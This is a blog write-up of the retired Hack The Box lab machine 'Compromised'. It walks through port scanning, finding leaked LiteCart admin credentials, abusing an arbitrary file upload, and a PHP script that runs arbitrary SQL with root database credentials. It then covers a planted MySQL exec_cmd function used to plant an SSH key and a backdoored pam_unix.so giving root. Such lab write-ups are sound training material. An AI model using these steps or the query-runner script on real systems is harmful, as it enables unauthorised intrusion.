Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Compromised
|htbmachinesretired|

Summary

Compromised is a Linux, hard box is a created by D4nch3n, Initial foothold was finding the backup and finding credentials for litecart and using that we can upload arbitrary file. using that we can a upload a MySQL php client to run queries and checking mysql UDF functions. and checking passwd we found mysql have bash shell. using the exec_cmd we can write our ssh_key to authorized_keys and ssh on the box as mysql. Enumerating the box we find a pam_unix.so Reverse Engineering that we get a password using that we can su as root

Initial Enumeration

Port Scan (nmap)

1
nmap -sC -sV -oN nmap/compromised 10.10.10.207
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Nmap 7.80 scan initiated Sun Sep 13 00:37:44 2020 as: nmap -sC -sV -oN nmap/compromised 10.129.11.18
Nmap scan report for 10.129.11.18
Host is up (0.23s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
|   256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_  256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://10.129.11.18/shop/en/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 13 00:38:20 2020 -- 1 IP address (1 host up) scanned in 36.01 seconds

Web

Opening the page we see that this is a litecart

Lets run gobuster on the root and do manual Enumeration on the side

just trying here and there we find a admin login

So we know we need to find some credentials to login at this portal.

GoBuster

Looking at gobuster result we find

1
2
3
/index.php (Status: 302)
/shop (Status: 301)
/backup (Status: 301)

in which backup seem most interesting so lets take a look at that.

backup contained only one file i.e a.tar.gz

Downloading and un-archiving it we see it is a backup of shop(litecart) so we poke around for information-s

in admin/login.php we find a find for some password as

Following that hint and checking the web we find a credential as

1
admin:theNextGenSt0r3!~

using that on admin login, we see we can login.

One interesting info we find is the litecart version to be 2.1.2

Backup dump

Coming back to backup dump we find another very interesting file as .sh.php which is a backdoor checking that on the we server we are able to find it but unable to execute anything.

Litecart (searchsploit)

Checking searchsploit we see a Arbitrary File Upload is present for this version of litecart

Using that we upload a shell again but we face the same issue again not able to execute any command.

so i modified my payload to upload a

1
2
3
<?php
 phpinfo();
?>

uploading that and checking we see lot of php system related functions are disabled

One thing we can do is think of a way to bypass that or look at some other things.

Enumerating DB (via web)

In the dump i had also found db credentials as root:changethis.

So I wrote a simple php to run any query i pass it

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
$servername = "localhost";
$username = "root";
$password = "changethis";
// Create connection
$conn = new mysqli($servername, $username, $password);

// Check connection
if ($conn->connect_error) {
  die("Connection failed: " . $conn->connect_error);
}
echo "Connected successfully";

$sql =  $_REQUEST["query"];
echo '\n';
echo $sql;
$result = $conn->query($sql);
if ($result->num_rows > 0) {
  while($row = $result->fetch_assoc()){
    echo "\n";
    print_r($row);
  }
}
else{
  echo '\n';
  echo "Failed?";
  print_r($result);
}

?>

And remembering that the server was previously compromised and there might be a backdoor left.

So i was looking and checking mysql.func

1
SELECT * from mysql.func;

we see an interesting function exec_cmd testing if we can run command via that

Checking passwd for mysql we also see

1
mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash

mysql user have bash shell attached to it.

Trying reverse shell didn’t had any success and was blocked by firewall

So i wrote a ssh-key to auhorized_keys and was able to ssh to the box as
mysql

and using that i was able to get a shell on the box as mysql

Privilege Escalation

Enumerating the box as mysql we find some interesting file as pam_unix.so

Downloading that and Reverse Engineering it we find a backdoor credential as zlke~U3Env82m2-.

using that and su root and get a shell and we can grab user and root flag.

Extra

I was also looking in bypassing the disable_functions and was able to do that using exploit

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/compromised/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxhardmysqlreverse-engineeringpam_unix-exploit